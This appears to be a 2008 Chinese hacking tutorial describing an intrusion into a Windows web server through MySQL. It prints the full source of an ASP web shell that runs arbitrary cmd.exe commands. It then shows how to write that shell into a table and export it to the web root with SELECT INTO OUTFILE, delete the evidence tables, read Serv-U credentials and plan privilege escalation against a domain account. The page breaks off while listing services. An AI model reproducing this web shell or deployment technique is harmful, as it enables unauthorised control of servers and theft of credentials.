|
| |
 精品推荐 |
 |
|
| |
|
|
|
|
通过Mysql入侵服务器
|
日期:2008年5月8日 作者: 查看:[大字体
中字体 小字体]
|
Set oFileSys = Server.CreateObject(""Scripting.FileSystemObject"")
szCMD = Request.Form("".CMD"")
If (szCMD 〈〉 """") Then
szTempFile = ""C:\" & oFileSys.GetTempName()
Call oScript.Run (""cmd.exe /c "" & szCMD & "" 〉 "" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If %〉
〈HTML〉〈BODY〉〈FORM action=""〈%= Request.ServerVariables(""URL"") %〉"" method=""POST""〉
〈input type=text name="".CMD"" size=45 value=""〈%= szCMD %〉""〉〈input type=submit value=""Run""〉〈/FORM〉〈PRE〉
〈% If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If%〉
〈/BODY〉〈/HTML〉
----------------------------end of cmd.asp-----------------------------------
由于往mysql数据库中插入数据的时候,会过滤特殊字符什么的,例如双引号之类的,特别麻烦。各位留意没有,上面的ASP语句中,都是
两个双引号一起的,这样才能写进去,原来是一个双引号的。然后我在数据库中再建一个表:
mysql〉 use test;create table cmd(str TEXT);
Database changed
Query OK, 0 rows affected (0.05 sec)
然后用如下语句,一句一句把上面的ASP写进去:
mysql〉 insert into cmd values("一行一行的asp代码,呵呵");
为什么不全部一起写进去呢?呵呵,换行后,一会儿导出的文件就会有特殊字符了,asp就不能正常运行了,只能辛苦点一行一行写了。然 后把asp文件导到服务器上:
mysql〉select * from cmd into outfile "d:\\www\\gb\\abou\\cmd.asp";
然后把我们刚才建的表都删除掉:
mysql〉 use test; drop table tmp; drop table cmd;
ok!我们得到一个shell了,虽然权限不高,但毕竟已经向取得admin权限迈出一大步了,不是吗,呵呵。做这个asp文件可花了我不少时间 哦。现在我们利用这个shell来收集系统信息,尝试取得admin权限。
〈1〉先看一下系统文件权限设置如何:
c:\ Everyone:(OI)(CI)F
d:\ \xxx:(OI)(CI)(DENY)(特殊访问:)
DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
STANDARD_RIGHTS_REQUIRED
FILE_READ_DATA
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_READ_EA
FILE_WRITE_EA
FILE_EXECUTE
FILE_DELETE_CHILD
FILE_READ_ATTRIBUTES
FILE_WRITE_ATTRIBUTES
Everyone:(OI)(CI)F
看来我们现在就可以读写硬盘上的任何文件了,现在就可以改他的首页了,但这样做没意思,对不对,我们的目标是取得admin权限,呵呵
〈2〉然后搜索一下硬盘上都有些什么文件:
c:\Program Files 的目录下有两个比较有意思的文件,
2000-12-19 13:10 Serv-U
2001-01-20 22:43 绿色警戒
把Serv-U里面的用户和密码读出来看看后,没有什么用处,然后进入绿色警戒目录看看,呵呵,除了log外,什么都没有,呵呵。
〈3〉再看看都有哪些用户:
Guest IUSR_SERVER_1 IUSR_SERVER-2
IWAM_SERVER_1 IWAM_SERVER-2 ceo[他们CEO的帐号J]
TsInternetUser
管理员有ceo 和target\Domain Admins,看来这台机器是他们域中的一台服务器。开始本来想给ceo下一个套,在他的启动目录里放一个程
序,但后来看到这个帐号已经几个月没登陆了,就放弃了。
〈4〉看看启动了那些服务,这几个比较有意思, 看来都是默认的:
Task Scheduler
上一篇:常见IP碎片攻击详解
下一篇:Asp限制IP访问
|
| 相关文章: |
|
|
|
| 相关软件: |
|
|
|
|
